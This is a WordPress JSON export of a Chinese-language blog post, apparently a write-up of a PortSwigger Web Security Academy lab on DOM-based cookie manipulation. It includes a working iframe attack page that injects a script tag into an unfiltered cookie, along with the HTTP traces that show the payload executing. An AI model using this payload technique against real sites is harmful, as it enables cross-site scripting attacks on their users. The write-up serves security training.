{"id":1259,"date":"2023-02-21T19:43:00","date_gmt":"2023-02-21T11:43:00","guid":{"rendered":"https:\/\/systw.net\/note\/?p=1259"},"modified":"2024-03-16T00:38:48","modified_gmt":"2024-03-15T16:38:48","slug":"dom-xss-with-cookie","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/1259","title":{"rendered":"DOM XSS to cookie"},"content":{"rendered":"\n

<\/p>\n\n\n\n

\u8b80\u53d6source\u6c92\u904e\u6ffe\u5c31\u628a\u4ed6\u5beb\u5230document.cookie<\/code>\uff0c\u653b\u64ca\u8005\u53ef\u4ee5\u64cd\u4f5ccookie\u5167\u5bb9<\/p>\n\n\n\n

\u8209\u4f8b\u5982\u4e0b\uff0c\u76ee\u6a19\u7db2\u7ad9\u7684cookie\u4f7f\u7528\u7684\u00a0lastViewedProduct<\/code>\uff0c\u6703\u5132\u5b58\u4f7f\u7528\u8005\u9020\u8a2a\u7684\u6700\u5f8c\u4e00\u500b\u7522\u54c1\u9801\u9762\u7684URL<\/p>\n\n\n\n

############## request ##############\nGET \/product?productId=1 HTTP\/1.1\n...omit...\nCookie: session=Vuaht7bMOlVnNwOHnHbiAUy6qsanFGBk; lastViewedProduct=https:\/\/ace51f041ea0fde18050178d00580093.web-security-academy.net\/product?productId=2<\/mark>\n\n############## response ##############\n...omit...\n<a href='https:\/\/ace51f041ea0fde18050178d00580093.web-security-academy.net\/product?productId=2'>Last viewed product<\/a><p>|<\/p>\n...omit...<\/code><\/pre>\n\n\n\n
lastViewedProduct\u7684javascript\u8655\u7406\u5982\u4e0b\uff0curl\u6703\u5b58\u9032lastViewedProduct<\/p>\n\n\n\n
<script>\r\ndocument.cookie = 'lastViewedProduct=' + window.location <\/mark>+ '; SameSite=None; Secure'\r\n<\/script>\r\n<div class=\"is-linkback\">\r\n<a href=\"\/\">Return to list<\/a>\r\n<\/div><\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
\u6e96\u5099\u4e00\u500b\u653b\u64ca\u9801\u9762\u8b93\u53d7\u5bb3\u8005\u8a2a\u554f\uff0c\u5167\u5bb9\u5982\u4e0b<\/p>\n\n\n\n
<iframe src=\"https:\/\/ace51f041ea0fde18050178d00580093.web-security-academy.net\/product?productId=1&'><script>alert(1)<\/script>\" onload=\"if(!window.x)this.src='https:\/\/ace51f041ea0fde18050178d00580093.web-security-academy.net';window.x=1;\"><\/code><\/pre>\n\n\n\n
\u7576iframe\u7b2c\u4e00\u6b21\u8f09\u5165\u6642\uff0c\u700f\u89bd\u5668\u6703\u66ab\u6642\u958b\u555f\u60e1\u610fURL\uff0c\u7136\u5f8c\u5c07\u6b64URL\u4f4d\u7f6e\u5132\u5b58\u5728lastViewedProduct\u7684cookie<\/p>\n\n\n\n
############## request ##############\nGET \/product?productId=1&%27%3E%3Cscript%3Ealert(1)%3C\/script%3E<\/mark> HTTP\/1.1\n...omit...\nCookie: session=Vuaht7bMOlVnNwOHnHbiAUy6qsanFGBk; lastViewedProduct=https:\/\/ace51f041ea0fde18050178d00580093.web-security-academy.net\/product?productId=1\n\n############## request ##############\n...omit...\n<a href='https:\/\/ace51f041ea0fde18050178d00580093.web-security-academy.net\/product?productId=1'>Last viewed product<\/a><p>|<\/p>\n...omit...<\/code><\/pre>\n\n\n\n
\u63a5\u8457onload \u4e8b\u4ef6\u8655\u7406\u7a0b\u5e8f\u78ba\u4fdd\u53d7\u5bb3\u8005\u7acb\u5373\u91cd\u5b9a\u5411\u5230\u4e3b\u9801\uff0c\u5982\u4e0b <\/p>\n\n\n\n
############## request ##############\nGET \/ HTTP\/1.1\n...omit...\nCookie: session=Vuaht7bMOlVnNwOHnHbiAUy6qsanFGBk; lastViewedProduct=https:\/\/ace51f041ea0fde18050178d00580093.web-security-academy.net\/product?productId=1&%27%3E%3Cscript%3Ealert(1)%3C\/script%3E<\/mark>\n\n############## request ##############\n...omit...\n<a href='https:\/\/ace51f041ea0fde18050178d00580093.web-security-academy.net\/product?productId=1&'><script>alert(1)<\/script>'>Last viewed product<\/a><\/mark><p>|<\/p>\n...omit...<\/code><\/pre>\n\n\n\n
\u7531\u65bccookie\u4e2d\u7684lastViewedProduct\u503c\u6703\u8b8a\u6210\u8fd4\u56de\u5167\u5bb9\u7684\u4e00\u90e8\u4efd\uff0c\u56e0\u6b64\u4f7f\u7528\u8005\u7aef\u6703\u57f7\u884c<script>alert(1)<\/script><\/code> <\/p>\n\n\n\n
Lab: DOM-based cookie manipulation<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
\u8b80\u53d6source\u6c92\u904e\u6ffe\u5c31\u628a\u4ed6\u5beb\u5230document.cooki …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[40],"tags":[41],"class_list":["post-1259","post","type-post","status-publish","format-standard","hentry","category-clientside","tag-xss"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1259","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1259"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1259\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1259"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1259"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1259"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}